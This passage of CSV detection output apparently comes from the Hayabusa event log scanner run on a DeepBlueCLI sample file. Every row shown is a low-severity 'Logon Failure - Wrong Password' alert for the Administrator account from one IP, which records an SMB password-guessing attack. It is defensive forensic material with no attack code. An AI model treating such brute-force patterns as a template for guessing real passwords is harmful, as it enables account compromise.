NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5QUvFvCM6AJhKjXe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NiVgC8oJ5W2Xr3t0 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hXfhdrbLnNOGDqy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcjMGbrHQHxIhSSh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LDYPTYHHKAe39GjM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PF3H6LE6MqFjVWx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.526 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LLTReOoxRa7UAhT3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:21.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jqtqwAPBiBfaHNpv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jmisFXzDpOILUhIX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W5UHqVVAYK08FWit : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PKHLHN59FDnD92Sm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.829 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ohAKPRGvg1JCQ91y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pxdcrng84HEG39nJ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.926 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lFGXFxHPbxDTGmiN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tyFnafBgzoLQWTQR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2IjLjxkd2pX4moFy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9vqYC4KotCYTcQv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qtHcYFIOHglQFb60 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:22.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmiHIQrpsAVRJtdb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4TdkChjMAviJ6jr8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.283 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sPIGU1rBk0F5cG9P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ScynGWKK3CtoUsi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0E4JAuxC8MuuGfnw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4aDJtqsUWKyuDqBq : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yCFrEHUgqCtKPybS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ftrEBfaLGbboV8D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: thle3slH6gZYllyQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PcEnabS7oj98WI0e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EBqGp9CD4A9PsyLk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:22.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iil8dQlzMCkKRNUb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.735 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nDBqxF9bmNNjNdsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QJNBRV3BRVEN8hmG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OGl1Tbdw7PDvVsRR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uspHTc4JwnjjZQti : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.930 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Exq3nfy1LeFOPcA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vdFC4g7vsLO0zOzL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HpdCohLheoqQ6DXw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xHS3sclMwgHuH8rE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sNSheImuQwgOEH5g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GX5y374mlYYXbAB2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:23.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eaFRL6q9KQY5bFHZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.230 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MrkEyJmfLiSrvQGs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fd1vJiJa3pdjqdQV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RVrZl3LOIa7VLhT7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TKR8KbyQkwRX1qTE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GY22XuDxbE5lvEra : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4AntiX3j9HLHcOOq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XIvMbod41WeNADy5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0UL4lb3CCrv7YfGQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OyRktDjPqFyrdSTQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HKEGmAH8Wbc7f3jC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:23.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 06Dfi4lO2Vdw3gCr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 29eXmenUTACkAHKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Zq7Gl6hnKDJJqFc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jKENlWYt6m78taZR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.863 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 822SUU2Hg6w6AqQh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bROU0Mk9Z4yEq323 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EKfVPleDpLLqkuKq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NGWVqbchMitnLVYT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.086 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y7K9vifU9lWwpP9J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oIgKYj210JfICJXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jisuKilPQivTV8yE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:24.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hckyoom0XnqpRzK8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: De0l6qgcuhMERjMY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.343 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SSa7pylPWn8jl2Ox : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ol9OntO4hqidlNUi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kXOBF0ZWLxMauHuT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WVBFJltkR5vnmpYD : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.554 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kHVXEHq9zNYdfTpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OIw3BxmLsfwDXXFg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.647 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hhgRhjnhkRJus4fw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xz78guWXrekEvuFT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 04wNT26RJmriQrfH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
